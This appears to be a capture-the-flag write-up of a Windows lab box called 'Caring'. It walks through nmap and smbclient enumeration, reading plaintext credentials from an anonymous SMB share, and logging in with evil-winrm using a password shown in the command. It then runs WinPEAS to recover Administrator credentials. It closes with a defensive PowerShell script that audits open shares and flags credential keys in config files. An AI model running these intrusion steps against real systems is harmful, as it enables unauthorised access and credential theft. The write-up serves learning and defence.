Myles Nieman

Caring

Overview

Caring is a very easy Windows box that chains two straightforward credential exposures. An open Config SMB share contains a config.ini file with plaintext credentials for the local user claudio. Logging in via WinRM and running WinPEAS reveals Administrator credentials stored on the box, enabling a direct WinRM login as Administrator.

Path: open SMB share → config.ini credentials → WinRM as claudio → WinPEAS → Administrator credentials → root.

Enumeration

A full TCP scan against the target reveals a Windows host with SMB and WinRM open, but no web service.

$ nmap -p- -A 10.129.95.244
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664-49670/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows

[Screenshot: Nmap output showing open SMB and WinRM ports]

WinRM on 5985 means that valid credentials will give us a shell directly.

Foothold — Open SMB Share

Anonymous SMB enumeration lists four shares, including a non-default Config share:

$ smbclient -L 10.129.95.244
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Config          Disk
        IPC$            IPC       Remote IPC
        Users           Disk

The Config share is accessible without credentials and contains a single file:

$ smbclient //10.129.95.244/Config
smb: \> ls
  config.ini    A  4749  Thu Nov 26 12:19:35 2020
smb: \> get config.ini

The config.ini file contains plaintext credentials for the claudio account:

[Screenshot: config.ini contents showing plaintext credentials for claudio]

The same credentials are confirmed in the file:

[Screenshot: config.ini credential view]

User

With claudio’s credentials in hand, WinRM gives us a shell:

$ evil-winrm -u claudio -p PurpleHaze! -i 10.129.95.244

[Screenshot: evil-winrm session established as claudio]

The session lands as a standard unprivileged user.

Privilege Escalation — WinPEAS

Running WinPEAS to identify escalation paths:

*Evil-WinRM* PS> upload /home/titan/HTB/Caring/winPEASany.exe
*Evil-WinRM* PS> .\winPEASany.exe

[Screenshot: WinPEAS privilege escalation checks]

WinPEAS surfaces Administrator credentials stored on the system:

[Screenshot: WinPEAS output showing Administrator credentials]

Root

With the Administrator credentials recovered, logging in via WinRM gives a session with full privileges:

[Screenshot: evil-winrm session as Administrator with root flag]

Both the user flag (from claudio’s desktop) and the root flag (from Administrator’s desktop) are readable from their respective sessions.

Takeaways

  • Unauthenticated SMB shares containing config files are a direct path to credentials — always require authentication on file shares, even for “read-only” configuration directories.
  • Credentials stored in plaintext on disk (picked up by WinPEAS) are a common escalation vector on Windows; secrets managers or DPAPI-protected storage should be used instead.
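Both takeaways come down to one check a defender can run on the file server itself. As an added example, not from the writeup or any tool it uses, the PowerShell audit below flags non-default shares whose share-level ACL grants Everyone, ANONYMOUS LOGON or Guests, reports the NullSessionShares registry list, and scans config files under each share path for credential-looking keys, printing only the key name and location rather than the value. The principal names and share names are assumptions based on Windows defaults and the shares seen on this box.

```powershell
# Added audit script (not part of the writeup). Run elevated on the host
# that exports the shares. Requires the SmbShare module (Windows 8/2012+).
$riskyPrincipals = @('Everyone', 'NT AUTHORITY\ANONYMOUS LOGON', 'BUILTIN\Guests', 'Guest')
$defaultShares   = @('ADMIN$', 'C$', 'IPC$')
# Keys that usually carry a secret when they appear as key=value in a config file.
$credPattern     = '^\s*(password|passwd|pwd|pass|secret|apikey|token)\s*='

# Shares listed in NullSessionShares are reachable over an unauthenticated session.
$lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$nullSessionShares = (Get-ItemProperty -Path $lanman -ErrorAction SilentlyContinue).NullSessionShares
if ($nullSessionShares) {
    Write-Warning "NullSessionShares is set: $($nullSessionShares -join ', ')"
}

foreach ($share in Get-SmbShare | Where-Object { $defaultShares -notcontains $_.Name }) {
    # Share-level ACL. NTFS permissions on the folder also apply, but an Allow
    # entry for one of these principals is what lets smbclient list and read
    # the share without credentials, as happened with Config on this box.
    $openEntries = Get-SmbShareAccess -Name $share.Name |
        Where-Object { $_.AccessControlType -eq 'Allow' -and $riskyPrincipals -contains $_.AccountName }

    if ($openEntries) {
        $who = ($openEntries | ForEach-Object { "$($_.AccountName):$($_.AccessRight)" }) -join ', '
        Write-Warning "Share '$($share.Name)' ($($share.Path)) grants $who"
    }

    # Look for plaintext credential keys in config files under the share root.
    if ($share.Path -and (Test-Path -LiteralPath $share.Path)) {
        Get-ChildItem -LiteralPath $share.Path -Recurse -File `
            -Include *.ini, *.config, *.conf, *.xml -ErrorAction SilentlyContinue |
            Select-String -Pattern $credPattern |
            ForEach-Object {
                # Report the key name and location only; never echo the secret into logs.
                $key = ($_.Line -split '=', 2)[0].Trim()
                Write-Warning "Possible plaintext credential '$key' in $($_.Path):$($_.LineNumber)"
            }
    }
}
```

Any warning from the first loop body is the condition that handed over claudio's password here; fixing it means removing the Everyone/Guest entry with Revoke-SmbShareAccess and moving the secret out of the file.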